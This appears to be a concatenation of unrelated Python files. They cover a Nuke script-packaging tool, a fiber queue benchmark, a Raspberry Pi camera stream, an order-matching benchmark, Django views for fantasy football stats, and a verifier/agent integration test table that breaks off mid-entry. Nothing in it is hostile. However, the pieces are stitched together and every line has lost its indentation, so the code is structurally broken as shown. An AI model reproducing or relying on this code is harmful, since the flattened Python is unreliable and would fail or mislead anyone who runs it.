WIgnoredLabel = window.findChild(QtWidgets.QLabel, "IgnoredLabel")
WCurrItemPath = window.findChild(QtWidgets.QLabel, "CurrItemPath")
WPackedItemPath = window.findChild(QtWidgets.QLabel, "PackedItemPath")
WCurrItemFiles = window.findChild(QtWidgets.QLabel, "CurrItemFiles")
WCurrItemSize = window.findChild(QtWidgets.QLabel, "CurrItemSize")
WCurrentCopyItem = window.findChild(QtWidgets.QLabel, "CurrentCopyItem")
WTotalProgress = window.findChild(QtWidgets.QProgressBar, "TotalProgress")
WItemProgress = window.findChild(QtWidgets.QProgressBar, "ItemProgress")
WTotalCopySize = window.findChild(QtWidgets.QLabel, "TotalCopySize")
WStart = window.findChild(QtWidgets.QPushButton, "Start")
WInterrupt = window.findChild(QtWidgets.QPushButton, "Interrupt")
WLWebsite = window.findChild(QtWidgets.QLabel, "LWebsite")
# connect widgets to functions
WPackedPath.textChanged.connect(lambda:PackedPathChanged())
WGoToRootFolder.clicked.connect(lambda:GoToRootFolder())
WChoosePackedPathButton.clicked.connect(lambda:ChoosePackedPath())
WSendToIgnore.clicked.connect(lambda:SendToIgnore())
WSendToCopy.clicked.connect(lambda:SendToCopy())
WRefresh.clicked.connect(lambda:Refresh())
WGoToFolder.clicked.connect(lambda:OpenFolder())
WGoToNode.clicked.connect(lambda:ToNode())
WListCopyPaths.itemSelectionChanged.connect(lambda:CopyListSelectionChanged())
WListIgnorePaths.itemSelectionChanged.connect(lambda:IgnoreListSelectionChanged())
WRelinkPaths.stateChanged.connect(lambda:RelinksInList(r = True))
WRelativeRelink.stateChanged.connect(lambda:RelinksInList(rr = True))
WNodeNameFolder.stateChanged.connect(lambda:UpdateItemInfo(n = True))
WParentDirectories.valueChanged.connect(lambda:UpdateItemInfo(pd = True))
WCopyFontDir.stateChanged.connect(lambda:AddOnsInList(f = True))
WCopyGizmos.stateChanged.connect(lambda:AddOnsInList(g = True))
WStart.clicked.connect(lambda:StartCopy())
WInterrupt.clicked.connect(lambda:StopCopy())
# disable esc
window.rejected.connect(lambda:exitForm())
# disable window resizing
window.setFixedSize(window.size())
# hide ui elements, set enable/disable state
ButtonsAllowed(True)
WIgnoredLabel.setVisible(False)
# show the UI window
window.show()
# read comp data
Refresh()
else:
# open chosen nuke script
nuke.scriptOpen(nk)
# non-threaded version of same function
data = RefreshThreaded()
return data
# python function start
def WrapItUp(fromterminal = False, nk = '', startnow = False, out = '', nodenamefolder = True, parentdircount = 3, relinked = True, relativerelinked = True, media = True, fonts = True, gizmos = True, csvcommas = False, licinteractive = False):
global WIU_AppPath
# set nuke app path if not running from terminal
if not fromterminal:
WIU_AppPath = nuke.EXE_PATH
# if run from python function or terminal
if out != '':
# empty line
print('')
# starting line
if fromterminal:
print('\n' + WIU_Log + 'Running from terminal (no UI)...')
else:
print('\n' + WIU_Log + 'Running from Python function (no UI)...')
# set to current nuke script if no custom one has been defined
if nk == '':
nk = nuke.scriptName()
nk = nk.replace('\\', '/')
# error bool
err = False
# check if out path exists, convert to backslashes
out = out.replace('\\', '/')
if not os.path.isdir(out):
err = True
print(WIU_Log + 'ERROR: Folder does not exist: ' + out)
if not os.path.isfile(nk):
err = True
print(WIU_Log + 'ERROR: Nuke script does not exist: ' + nk)
# check if parent directory count is a valid number
if parentdircount < 1 or parentdircount > 99:
err = True
print(WIU_Log + 'ERROR: directory count (' + str(parentdircount) + ') should be in range 1-99!')
# silent mode
silent = True
# exit on error
if err:
return
# start
else:
# param list
p = [['Nuke script\t', nk],
['Output path\t', out],
['Node name folders', nodenamefolder],
['Parent dir count', parentdircount],
['Relink\t', relinked],
['Relink relative', relativerelinked],
['Media\t', media],
['Fonts\t', fonts],
['Gizmo files\t', gizmos],
['CSV commas\t', csvcommas],
['Interactive license', licinteractive]]
# param string
param = '\n' + WIU_Log + 'Selected parameters'
for i in p:
param += '\n' + WIU_Log + i[0] + '\t\t' + str(i[1])
print(param)
# only print preview
returnedFiles = _Start(silent, nk, False, out, nodenamefolder, parentdircount, relinked, relativerelinked, media, fonts, gizmos, csvcommas, licinteractive)
returnedStr = ''
for i in returnedFiles:
returnedStr += '\n' + WIU_Log + str(i)
print('\n' + WIU_Log + 'Found files (' + BytesToString(WIU_TotalSize) + '):\n' + returnedStr + '\n')
# if starting right away
if startnow:
# start
print('\n' + WIU_Log + 'Starting...' + '\n')
# begin
_Start(silent, nk, startnow, out, nodenamefolder, parentdircount, relinked, relativerelinked, media, fonts, gizmos, csvcommas, licinteractive)
# if running with UI in Nuke
if out == '' and not fromterminal:
# starting in UI mode w/o parameters
_Start()
# autostart (if not imported)
if __name__ == "__main__":
# get all args
c = nuke.rawArgs
# check if running from terminal
t = False
ti = False
try:
t = '-t' in c
ti = '-i' in c
except Exception as e:
pass
# start with terminal commands
if t or ti:
# error bool
err = False
# get path
WIU_AppPath = c[0]
# nukescript
aNK = ''
for index, arg in enumerate(c):
if arg in ['-nk'] and len(c) > index + 1:
aNK = c[index + 1]
del c[index]
del c[index]
break
# destination path
aOut = ''
for index, arg in enumerate(c):
if arg in ['-o'] and len(c) > index + 1:
aOut = c[index + 1]
del c[index]
del c[index]
break
# start (instead of only returning a to-do list)
aStart = False
for index, arg in enumerate(c):
if arg in ['-s']:
aStart = True
del c[index]
break
# node name directory
aNodeName = True
for index, arg in enumerate(c):
if arg in ['-n']:
aNodeName = False
del c[index]
break
# parent directory count
aDirCount = 3
for index, arg in enumerate(c):
if arg in ['-pd']:
try:
aDirCount = int(c[index + 1])
except Exception as e:
err = True
print(WIU_Log + 'Non-numerical value entered for -pd.')
del c[index]
del c[index]
break
# relinked
aReli = True
for index, arg in enumerate(c):
if arg in ['-r']:
aReli = False
del c[index]
break
# relinked relative
aReliRela = True
for index, arg in enumerate(c):
if arg in ['-rr']:
aReliRela = False
del c[index]
break
# media
aMedia = True
for index, arg in enumerate(c):
if arg in ['-m']:
aMedia = False
del c[index]
break
# fonts
aFonts = True
for index, arg in enumerate(c):
if arg in ['-f']:
aFonts = False
del c[index]
break
# gizmos
aGizmos = True
for index, arg in enumerate(c):
if arg in ['-g']:
aGizmos = False
del c[index]
break
# csv commas
aCSV = False
for index, arg in enumerate(c):
if arg in ['-csvcommas']:
aCSV = True
del c[index]
break
# use same license
aLicInteractive = ti
# error handling
if err:
print(WIU_Log + 'Usage:\n-nk <nukescript path> (required)\n-o <output folder> (required)\n-s (start now - if not, only a preview list of the files to be processed will be returned)\n-n (disable: place media in node name folder)\n-pd <parent directory count> (default: 3)\n-r (disable: make relinked .nk)\n-rr (disable: make relative relinked .nk)\n-m (disable: collect media)\n-f (disable: collect font folder)\n-g (disable: collect gizmos)\n-csvcommas (use commas instead of semicolons as the CSV separator)')
else:
WrapItUp(fromterminal = True, nk = aNK, startnow = aStart, out = aOut, nodenamefolder = aNodeName, parentdircount = aDirCount, relinked = aReli, relativerelinked = aReliRela, media = aMedia, fonts = aFonts, gizmos = aGizmos, csvcommas = aCSV, licinteractive = aLicInteractive)
else:
WrapItUp()
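# Example invocations (the executable name and paths below are illustrative only):
#   terminal: Nuke11.3 -t WrapItUp.py -nk /path/to/comp.nk -o /path/to/output -s
#   python:   import WrapItUp; WrapItUp.WrapItUp(nk='/path/to/comp.nk', out='/path/to/output', startnow=True)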
|
bench_queue.py
|
import sys
import time
import fiber
import multiprocessing as mp
from threading import Thread
from fiber import SimpleQueue as Queue
from datetime import datetime
import logging
import time
import random
logger = logging.getLogger('fiber')
logger.setLevel(logging.DEBUG)
NUM = int(1e6)
MSG = "MESSAGE_"# * 1024
def worker(recv_q, send_q):
every = NUM / 10
for task_nbr in range(NUM):
send_q.put(MSG + str(task_nbr))
if task_nbr % every == 0:
print("worker put", task_nbr, MSG)
print("before worker got")
msg = recv_q.get()
print("worker got", msg)
sys.exit(1)
def single_queue_mp_write(mplib):
"""Single queue, get in master process and put in worker process."""
every = NUM / 10
send_q = mplib.SimpleQueue()
recv_q = mplib.SimpleQueue()
mplib.Process(target=worker, daemon=True, args=(send_q, recv_q)).start()
for num in range(NUM):
msg = recv_q.get()
if num % every == 0:
print("master got", num, msg)
send_q.put(None)
print("master put", None)
def single_queue_sync_rw(mplib):
"""Synchronize write and read."""
send_q = mplib.SimpleQueue()
put = False
for num in range(NUM):
if num % 1000 == 0:
put = not put
print(datetime.now().strftime("%H:%M:%S.%f"), "put" if put else "get", num)
if put:
send_q.put(MSG)
else:
send_q.get()
def bench(func, mplib=fiber):
"""Benchmark func with a multiprocessing lib: fiber or multiprocessiong."""
start_time = time.time()
func(mplib)
end_time = time.time()
duration = end_time - start_time
msg_per_sec = NUM / duration
doc = func.__doc__.strip() if func.__doc__ is not None else ""
print("Benchmark result - {} - {}\n{}".format(func.__name__, mplib.__name__, doc))
print("Duration: {}".format(duration))
print("Messages Per Second: {}".format(msg_per_sec))
print("Effective Data Rate: {} Mbps".format(msg_per_sec * len(MSG) * 8 / 1e6))
def pi_inside(p):
x, y = random.random(), random.random()
return x * x + y * y < 1
def pi_estimation(mp_lib):
"""Benchmark pi estimation with random number sampling."""
NUM_SAMPLES = int(2e4)
pool = mp_lib.Pool(processes=4)
count = sum(pool.map(pi_inside, range(0, NUM_SAMPLES)))
print("Pi is roughly {}".format(4.0 * count / NUM_SAMPLES))
def compare(func):
"""Run func with both multiprocessing and fiber."""
start_time = time.time()
func(mp)
end_time = time.time()
duration1 = end_time - start_time
doc = func.__doc__.strip() if func.__doc__ is not None else ""
print("Compare result - {}\n{}".format(func.__name__, doc))
print("multiprocessing duration: {}".format(duration1))
start_time = time.time()
func(fiber)
end_time = time.time()
duration2 = end_time - start_time
print("fiber duration: {}".format(duration2))
print("fiber vs. multiprocessing: {:.2%}".format(duration2 / duration1))
if __name__ == "__main__":
#bench(single_queue_sync_rw, mplib=fiber)
#bench(single_queue_mp_write, mplib=fiber)
#compare(pi_estimation)
compare(single_queue_sync_rw)
#compare(single_queue_mp_write)
|
picam.py
|
# import the necessary packages
from picamera.array import PiRGBArray
from picamera import PiCamera
from threading import Thread
import cv2
class PiVideoStream:
def __init__(self, resolution=(320, 240), framerate=32, rotation=0):
# initialize the camera and stream
self.camera = PiCamera()
self.camera.resolution = resolution
self.camera.framerate = framerate
self.camera.rotation = rotation
self.rawCapture = PiRGBArray(self.camera, size=resolution)
self.stream = self.camera.capture_continuous(self.rawCapture,
format="bgr", use_video_port=True)
# initialize the frame and the variable used to indicate
# if the thread should be stopped
self.frame = None
self.stopped = False
def start(self):
# start the thread to read frames from the video stream
Thread(target=self.update, args=()).start()
return self
def update(self):
# keep looping infinitely until the thread is stopped
for f in self.stream:
# grab the frame from the stream and clear the stream in
# preparation for the next frame
self.frame = f.array
self.rawCapture.truncate(0)
# if the thread indicator variable is set, stop the thread
# and release camera resources
if self.stopped:
self.stream.close()
self.rawCapture.close()
self.camera.close()
return
def read(self):
# return the frame most recently read
return self.frame
def stop(self):
# indicate that the thread should be stopped
self.stopped = True
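# Minimal usage sketch (not part of the original module; the cv2 display calls are illustrative only):
#
# import time
# vs = PiVideoStream(resolution=(320, 240), framerate=32).start()
# time.sleep(2.0)  # give the camera sensor time to warm up
# while True:
#     frame = vs.read()
#     if frame is None:
#         continue
#     cv2.imshow("Frame", frame)
#     if cv2.waitKey(1) & 0xFF == ord("q"):
#         break
# vs.stop()
# cv2.destroyAllWindows()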
|
benchmark.py
|
import socket
import json
import threading
import random
from timeit import default_timer as timer
import engine as m_engine
import server as m_server
def direct_benchmark(nr_of_orders, midpoint=100):
engine = m_engine.MatchingEngine()
orderbook_size = len(engine.orderbook)
orders = []
for i in range(nr_of_orders):
side = random.choice(["buy", "sell"])
price = random.gauss(midpoint, 5)
quantity = random.expovariate(0.05)
orders.append(m_engine.Order("Null", "limit", side, price, quantity))
start = timer()
for order in orders:
engine.process(order)
end = timer()
t = end - start
print('{0} orders processed over {1:.2f} seconds,'.format(nr_of_orders, t))
print("at an average speed of {0:.0f} orders/second or {1:.2f} microseconds/order,".format((nr_of_orders/t), (t/nr_of_orders) * 1000 * 1000))
print('resulting in {0} new orders in the book and {1} trades.'.format( len(engine.orderbook)-orderbook_size, len(engine.trades)))
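# e.g. direct_benchmark(100000)  # illustrative call; exercises the matching engine without the socket layer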
def socket_benchmark(nr_of_orders, midpoint=100):
engine = m_engine.MatchingEngine()
server = m_server.MatchingEngineServer(("localhost", 8080), engine)
t = threading.Thread(target=server.serve_forever)
t.daemon = True
t.start()
orderbook_size = len(engine.orderbook)
orders = []
for i in range(nr_of_orders):
side = random.choice(["buy", "sell"])
price = random.gauss(midpoint, 5)
quantity = random.expovariate(0.05)
orders.append({'id': 0, 'type': 'limit', 'side': side, 'price': price, 'quantity': quantity})
start = timer()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(("localhost", 8080))
for order in orders:
serialized_order = json.dumps(order).encode('utf-8')
sock.sendall(serialized_order)
acknowledge = str(sock.recv(1024), "utf-8")
end = timer()
t = end - start
print('{0} orders processed over {1:.2f} seconds,'.format(nr_of_orders, t))
print("at an average speed of {0:.0f} orders/second or {1:.2f} microseconds/order,".format((nr_of_orders/t), (t/nr_of_orders) * 1000 * 1000))
print('resulting in {0} new orders in the book and {1} trades.'.format( len(engine.orderbook)-orderbook_size, len(engine.trades)))
socket_benchmark(100000)
|
views.py
|
# -*- coding: utf-8 -*-
from datetime import datetime
from django.contrib.auth.models import User
from django.http import Http404
from django.shortcuts import render
from espnff import League
from rest_framework import authentication, permissions
from rest_framework.decorators import api_view
from rest_framework.response import Response
from rest_framework.views import APIView
from threading import Lock, Thread
#############################
#
# General Utils
#
#############################
mutex = Lock()
def getCurrentYear():
now = datetime.now()
if (now.month < 8):
return now.year - 1
return now.year
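# e.g. a call in March 2018 returns 2017 (the season that started in the fall of 2017),
# while a call in September 2018 returns 2018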
def toDict(obj):
return obj.__dict__
#############################
#
# ESPN FF API Utils
#
#############################
def createLeagueObject(leagueId, year=getCurrentYear()):  # note: this default is evaluated once at import time, not per call
return League(leagueId, year)
def serializeBasicTeam(team):
if not team:
return {}
return {
'team_id': team.team_id,
'team_name': team.team_name,
'wins': int(team.wins),
'losses': int(team.losses),
'owner': team.owner
}
def serializeMatchup(matchup):
matchup.home_team = serializeBasicTeam(matchup.home_team)
matchup.away_team = serializeBasicTeam(matchup.away_team)
return toDict(matchup)
def serializeRankings(rankings):
return list(map(lambda pair: { 'score': float(pair[0]), 'team': serializeBasicTeam(pair[1]) }, rankings))
def serializeTeam(team):
team.schedule = list(map(lambda t: serializeBasicTeam(t), team.schedule))
return toDict(team)
def threadedBuildHistoryFromMatchups(league, teamHistory, teamId):
for week in list(range(1, 18)):
try:
scoreboard = league.scoreboard(week=week)
except:
break
else:
matchup = None
opponentOwner = None
opponentId = None
opponentSide = None
side = None
for m in scoreboard:
if (m.home_team.team_id == int(teamId)):
matchup = m
side = 'home'
opponentOwner = m.away_team.owner
opponentId = str(m.away_team.team_id)
opponentSide = 'away'
elif (m.away_team.team_id == int(teamId)):
matchup = m
side = 'away'
opponentOwner = m.home_team.owner
opponentId = str(m.home_team.team_id)
opponentSide = 'home'
if (matchup and matchup.data['winner'] != 'undecided'):
mutex.acquire()
try:
if (not opponentId in teamHistory['matchupHistory']):
teamHistory['matchupHistory'][opponentId] = {
'margin': 0,
'marginOfDefeat': 0,
'marginOfVictory': 0,
'opponentName': opponentOwner,
'losses': 0,
'ties': 0,
'wins': 0
}
if (matchup.data['winner'] == side):
teamHistory['wins'] += 1
teamHistory['margin'] += abs(m.home_score - m.away_score)
teamHistory['marginOfVictory'] += abs(m.home_score - m.away_score)
teamHistory['matchupHistory'][opponentId]['wins'] += 1
teamHistory['matchupHistory'][opponentId]['margin'] += abs(m.home_score - m.away_score)
teamHistory['matchupHistory'][opponentId]['marginOfVictory'] += abs(m.home_score - m.away_score)
elif (matchup.data['winner'] == opponentSide):
teamHistory['losses'] += 1
teamHistory['margin'] += (-1 * abs(m.home_score - m.away_score))
teamHistory['marginOfDefeat'] += (-1 * abs(m.home_score - m.away_score))
teamHistory['matchupHistory'][opponentId]['losses'] += 1
teamHistory['matchupHistory'][opponentId]['margin'] += (-1 * abs(m.home_score - m.away_score))
teamHistory['matchupHistory'][opponentId]['marginOfDefeat'] += (-1 * abs(m.home_score - m.away_score))
else:
teamHistory['ties'] += 1
teamHistory['matchupHistory'][opponentId]['ties'] += 1
finally:
mutex.release()
#############################
#
# Views
#
#############################
@api_view(['GET'])
def getTeams(request, leagueId, year=getCurrentYear()):
league = createLeagueObject(leagueId, year)
teams = list(map(lambda team: serializeTeam(team), league.teams))
response = { 'teams': teams }
return Response(response)
@api_view(['GET'])
def getTeam(request, leagueId, teamId, year=getCurrentYear()):
league = createLeagueObject(leagueId, year)
team = None
for t in league.teams:
if t.team_id == int(teamId):
team = t
if not team:
raise Http404('Team does not exist')
return Response(serializeTeam(team))
@api_view(['GET'])
def getPowerRankings(request, leagueId, year=getCurrentYear()):
league = createLeagueObject(leagueId, year)
week = league.teams[0].wins + league.teams[0].losses
rankings = league.power_rankings(week=week)
return Response({ 'rankings': serializeRankings(rankings), 'week': week })
@api_view(['GET'])
def getScoreboard(request, leagueId, year=getCurrentYear()):
league = createLeagueObject(leagueId, year)
scoreboard = list(map(lambda matchup: serializeMatchup(matchup), league.scoreboard()))
return Response({ 'scoreboard': scoreboard })
@api_view(['GET'])
def getTeamHistory(request, leagueId, teamId):
error = None
teamHistory = {
'margin': 0,
'marginOfDefeat': 0,
'marginOfVictory': 0,
'losses': 0,
'ties': 0,
'wins': 0,
'matchupHistory': {}
}
year = getCurrentYear()
listOfThreads = []
while (not error):
try:
league = createLeagueObject(leagueId, year)
except:
error = True
else:
if (int(leagueId) == 336358 and year == 2010):
error = True
continue
team = None
for t in league.teams:
if t.team_id == int(teamId):
team = t
if (team):
t = Thread(target = threadedBuildHistoryFromMatchups, args=(league, teamHistory, teamId))
t.start()
listOfThreads.append(t)
year -= 1
for thread in listOfThreads:
thread.join()
games = teamHistory['wins'] + teamHistory['losses'] + teamHistory['ties']
# guard against division by zero when there are no games, losses or wins on record
teamHistory['margin'] = round(teamHistory['margin'] / games, 2) if games else 0
teamHistory['marginOfDefeat'] = round(teamHistory['marginOfDefeat'] / teamHistory['losses'], 2) if teamHistory['losses'] else 0
teamHistory['marginOfVictory'] = round(teamHistory['marginOfVictory'] / teamHistory['wins'], 2) if teamHistory['wins'] else 0
for matchup in teamHistory['matchupHistory']:
matchup = teamHistory['matchupHistory'][matchup]
games = matchup['wins'] + matchup['losses'] + matchup['ties']
matchup['margin'] = round(matchup['margin'] / games, 2) if games else 0
matchup['marginOfDefeat'] = round(matchup['marginOfDefeat'] / matchup['losses'], 2) if matchup['losses'] else 0
matchup['marginOfVictory'] = round(matchup['marginOfVictory'] / matchup['wins'], 2) if matchup['wins'] else 0
return Response(teamHistory)
|
oldtest.py
|
'''
SPDX-License-Identifier: BSD-2-Clause
Copyright 2017 Massachusetts Institute of Technology.
'''
import unittest
import threading
import tornado_requests
import os
import json
import base64
import configparser
import common
import crypto
import tempfile
import signal
import subprocess
import queue
import uuid
import time
import tenant
from distutils.dir_util import copy_tree
import shutil
sentinel=None
cv_process = None
cn_process = None
cn_process_list = []
queue = queue.Queue()
num_threads = 5
config = configparser.RawConfigParser()
config.read(common.CONFIG_FILE)
cloudverifier_port = config.get('general', 'cloudverifier_port')
cloudagent_port = config.get('general', 'cloudagent_port')
registrar_port = config.get('general', 'registrar_port')
cloudagent_ip = config.get('tenant', 'cloudagent_ip')
cloudverifier_ip = config.get('tenant', 'cloudverifier_ip')
registrar_ip = config.get('tenant', 'cloudverifier_ip')
tpm_policy = json.loads(config.get('tenant', 'tpm_policy'))
my_cert = config.get('tenant', 'my_cert')
ca_cert = config.get('tenant', 'ca_cert')
private_key = config.get('tenant', 'private_key')
test_num_cloudagents = config.getint('general','test_num_cloudagents')
test_duration = config.getint('general','test_duration')
# cv_persistence_filename = config.get('cloud_verifier', 'persistence_filename')
# en_persistence_filename = config.get('registrar', 'persistence_filename')
cv_persistence_filename = None
en_persistence_filename = None
K = None
U = None
V = None
def readKUV():
global K, U, V
# read the keys in
f = open('content_keys.txt','r')
K = base64.b64decode(f.readline())
U = base64.b64decode(f.readline())
V = base64.b64decode(f.readline())
f.close()
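# content_keys.txt is expected to hold three base64-encoded lines: K, U and V, in that order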
def text_callback(request, context):
context.status_code = 402
return '{}'
class Test(unittest.TestCase):
cloudverifier_process = None
@classmethod
def setUpClass(cls):
cls.test_table = {
"test_cloudagent_tenant_get_nonce" : {
"prerun_function" : {"name":"launch_cloudagent", "argument": None},
"state_change_functions": [
{
"function_name": "test_cloudagent_tenant_get_nonce",
"http_request_verb":"GET",
"http_request_ip": cloudagent_ip,
"http_request_port": cloudagent_port,
"http_request_query": {"nonce":"ThisIsThePasswordABC"},
"http_request_path": "/v1/quotes/tenant",
"http_result_status_expected": 200,
"check_function" : {"name":"check_test_cloudagent_tenant_get_nonce"},
}
],
"postrun_function" : {"name":"kill_cloudagent", "argument": None},
},
"test_cloudagent_tenant_get_quote" : {
"prerun_function" : {"name":"launch_cloudagent", "argument": None},
"state_change_functions": [
{
"function_name": "test_cloudagent_tenant_get_quote",
"http_request_verb":"POST",
"http_request_ip": cloudagent_ip,
"http_request_port":cloudagent_port,
"http_request_path": "/v1/quotes/tenant",
"http_request_body": '{"encrypt_check": "K+oD4GfBMAdOFy94ZxTU2hB77tySSB75VVz2Zo4jN02txhNK2KiO5JhE1SRIUVASMZMW/VQUS9WgWdCUaJ+LOTWSuQ13alG4P4cLoamBr9c=","encrypted_key":"rBWIxK4i6zTl/M69Yyh2hmX+itDR9QCx4CIqmuRrEN3JAIUc2M+balr8gPD9r3Bs0OxYRC8/kcxBNo9Bsm93WZKwlmbZt2uVxhfaAqXwdGVpMBnM3bQnAEj1LIFoZZyQ48PVIdrEO4WW73Z2X3fplEFgOC3YT3lzluYgrn8iBkMRm+o2pJMdhynh6xLguszLX7qDOccPIIJch14ftWlsy6Ya9a6LHr9+hIfs4p2ATVVSl1wtUbf/ouNJdqUPAiFc4oXsg+kHQzWWiipjsAm871cA4wlvUb+/D4mFz1p3PRAK9hcICGwKoanWh8jbeuYnoqkch2EoHeLqayrisfNogg=="}',
"http_result_status_expected": 200,
}
],
"postrun_function" : {"name":"kill_cloudagent", "argument": None},
},
"test_cloudverifier_tenant_provide_v" : {
#"prerun_function" : {"name":"launch_cloudverifier", "argument": None},
"state_change_functions": [
{
"function_name": "test_cloudverifier_tenant_provide_v",
#"pre_function" : {"name":"do_mock_for_test_cloudverifier_tenant_provide_v", "argument": None},
"http_request_verb":"POST",
"http_request_ip": cloudverifier_ip,
"http_request_port":cloudverifier_port,
"http_request_path": "/v1/instances",
"http_request_body": '{"v": "nsRIy93UeeAi3GhAxpEcMH6R7OmaB7ArBdn2bEgyEwU=","agent_id":"06480EC4-6BF3-4F00-8323-FE6AE5868297","cloudagent_ip":"127.0.0.1","cloudagent_port":"8882","tpm_policy": {"00": "0000000000000000000000000000000000000000", "mask": "0x400801", "22": "ffffffffffffffffffffffffffffffffffffffff"}}',
"http_result_status_expected": 200,
#"concurrent_instances" : 10,
#"concurrent_new_thread_function" : "new_thread",
#"test_iterations" : 100,
},
],
},
"test_concurrent_access" : {
"prerun_function" : {"name":"launch_cloudverifier", "argument": None},
"state_change_functions": [
{
"function_name": "test_concurrent_access",
"http_request_verb":"POST",
"http_request_ip": cloudverifier_ip,
"http_request_port":cloudverifier_port,
"http_request_path": "/v1/instances",
"http_request_body": '{"v": "nsRIy93UeeAi3GhAxpEcMH6R7OmaB7ArBdn2bEgyEwU=","agent_id":"06480EC4-6BF3-4F00-8323-FE6AE5868297","cloudagent_ip":"127.0.0.1","cloudagent_port":"8882","tpm_policy": {"00": "0000000000000000000000000000000000000000", "mask": "0x400801", "22": "ffffffffffffffffffffffffffffffffffffffff"}}',
"http_result_status_expected": 200,
"concurrency" : {"instances": 5, "new_thread_function":"new_thread"},
"test_iterations" : 100,
},
],
"state_validation_functions": [
{
"function_name": "test_agent_id_list",
"http_request_verb":"GET",
"http_request_ip": cloudverifier_ip,
"http_request_port":cloudverifier_port,
"http_request_path": "/v1/instances",
#"http_request_body": '{"v": "nsRIy93UeeAi3GhAxpEcMH6R7OmaB7ArBdn2bEgyEwU=","agent_id":"06480EC4-6BF3-4F00-8323-FE6AE5868297","cloudagent_ip":"127.0.0.1","cloudagent_port":"8882","tpm_policy": {"00": "0000000000000000000000000000000000000000", "mask": "0x400801", "22": "ffffffffffffffffffffffffffffffffffffffff"}}',
"http_result_status_expected": 200,
"check_function" : {"name":"check_and_delete_all_entries", "argument": 500}
},
],
"postrun_function" : {"name":"kill_cloudverifier", "argument": None},
},
"test_concurrent_cloudnodiness" : {
#"prerun_function" : {"name":"launch_cloudagents", "args": {'starting_port':9000, 'num_cloudagent_instances':250}},
"prerun_function" : {"name":"launch_cloudagents", "args": {'port_file':'cloudagent_port.txt', 'num_cloudagent_instances':test_num_cloudagents}},
"state_change_functions": [
{
"pre_function" : {"name":"test_concurrent_cloudnodiness_modify_request", "argument": 500},
"function_name": "test_concurrent_cloudnodiness",
"http_request_verb":"POST",
"http_request_ip": cloudverifier_ip,
"http_request_port":cloudverifier_port,
"http_request_path": "/v1/instances",
"http_request_body": '{"v": "nsRIy93UeeAi3GhAxpEcMH6R7OmaB7ArBdn2bEgyEwU=","agent_id":"C432FBB3-D2F1-4A97-9EF7-75BD81C00000","cloudagent_ip":"cloudagent_ip.txt","cloudagent_port":"cloudagent_port.txt","tpm_policy": {"22":"ffffffffffffffffffffffffffffffffffffffff","16":"0000000000000000000000000000000000000000"} }',
"http_result_status_expected": 200,
"test_iterations" : test_num_cloudagents,
"post_function" : {"name":"test_concurrent_cloudnodiness_reset_request", "args": {"ip_file": "cloudagent_ip.txt","port_file":"cloudagent_port.txt"} },
},
],
"postrun_function" : {"name":"kill_cloudagents_after_delay", "args": {'sleep': test_duration, 'port_file':'cloudagent_port.txt', 'num_cloudagent_instances':test_num_cloudagents} },
},
"test_full_integration_happy_path" : {
#"prerun_function" : {"name":"launch_required_servers", "argument": None},
"state_change_functions": [
{
"function_name": "do_cloudagent_part",
"http_request_verb":"GET",
"http_request_ip": cloudagent_ip,
"http_request_port":cloudagent_port,
"http_request_path": "/v1/quotes/tenant",
"http_request_query": {"nonce":"ThisIsThePasswordABC"},
"http_result_status_expected": 200,
"check_function" : {"name":"provide_e"},
#"concurrent_new_thread_function" : "new_thread",
#"test_iterations" : 100,
},
{
"function_name": "do_cloudverifier_part",
"http_request_verb":"POST",
"http_request_ip": cloudverifier_ip,
"http_request_port":cloudverifier_port,
"http_request_path": "/v1/instances",
"http_request_body": '{"v": "XrNfEiODfu1fdXGtWbA+Wk02UhBxx1jTq7zhbC54ROA=","agent_id":"C432FBB3-D2F1-4A97-9EF7-75BD81C866E9","cloudagent_ip":"127.0.0.1","cloudagent_port":"8882","tpm_policy": {"00": "0000000000000000000000000000000000000000", "mask": "0x400801", "22": "ffffffffffffffffffffffffffffffffffffffff"}}',
"http_result_status_expected": 200,
"check_function" : {"name":"check_test_sleep", "argument": 5},
#"concurrent_new_thread_function" : "new_thread",
#"test_iterations" : 100,
},
],
#"postrun_function" : {"name":"kill_required_servers", "argument": None},
},
"test_persistance_file_load" : {
"prerun_function" : {"name":"launch_cloudverifier", "args": '{"06480EC4-6BF3-4F00-8323-FE6AE5868297": {"tpm_policy": {"00": "0000000000000000000000000000000000000000", "mask": "0x400801", "22": "ffffffffffffffffffffffffffffffffffffffff"}, "ip": "127.0.0.1", "port": "8882", "v": "nsRIy93UeeAi3GhAxpEcMH6R7OmaB7ArBdn2bEgyEwU="}}'},
"state_change_functions": [
{
"function_name": "test_persistance_file_load",
"http_request_verb":"GET",
"http_request_ip": cloudverifier_ip,
"http_request_port":cloudverifier_port,
"http_request_path": "/v1/instances",
"http_result_status_expected": 200,
"check_function" : {"name":"check_test_persistance_file_load", "argument": "06480EC4-6BF3-4F00-8323-FE6AE5868297"},
},
],
"postrun_function" : {"name":"kill_cloudverifier", "argument": None},
},
"test_persistance_file_write" : {
"prerun_function" : {"name":"launch_cloudverifier", "args": '{}'},
"state_change_functions": [
{
"function_name": "test_persistance_file_write",
"http_request_verb":"POST",
"http_request_ip": cloudverifier_ip,
"http_request_port":cloudverifier_port,
"http_request_path": "/v1/instances",
"http_request_body": '{"v": "nsRIy93UeeAi3GhAxpEcMH6R7OmaB7ArBdn2bEgyEwU=","agent_id":"06480EC4-6BF3-4F00-8323-FE6AE5868297","cloudagent_ip":"127.0.0.1","cloudagent_port":"8882","tpm_policy": {"00": "0000000000000000000000000000000000000000", "mask": "0x400801", "22": "ffffffffffffffffffffffffffffffffffffffff"}}',
"http_result_status_expected": 200,
"check_function" : {"name":"check_test_persistance_file_write", "argument": "06480EC4-6BF3-4F00-8323-FE6AE5868297"},
},
],
"postrun_function" : {"name":"kill_cloudverifier", "argument": None},
},
"test_persistance_file_bad" : {
"prerun_function" : {"name":"launch_cloudverifier", "args": '{'},
},
"test_persistance_file_empty" : {
"prerun_function" : {"name":"launch_cloudverifier", "args": ''},
"state_change_functions": [
{
"function_name": "test_persistance_file_empty",
"http_request_verb":"GET",
"http_request_ip": cloudverifier_ip,
"http_request_port":cloudverifier_port,
"http_request_path": "/v1/instances",
"http_result_status_expected": 200,
"check_function" : {"name":"test_check_persistance_file_empty", "argument": None},
},
],
"postrun_function" : {"name":"kill_cloudverifier", "argument": None},
},
"test_persistance_file_nonexistent" : {
"prerun_function" : {"name":"launch_cloudverifier", "args": None},
"state_change_functions": [
{
"function_name": "test_persistance_file_nonexistent",
"http_request_verb":"GET",
"http_request_ip": cloudverifier_ip,
"http_request_port":cloudverifier_port,
"http_request_path": "/v1/instances",
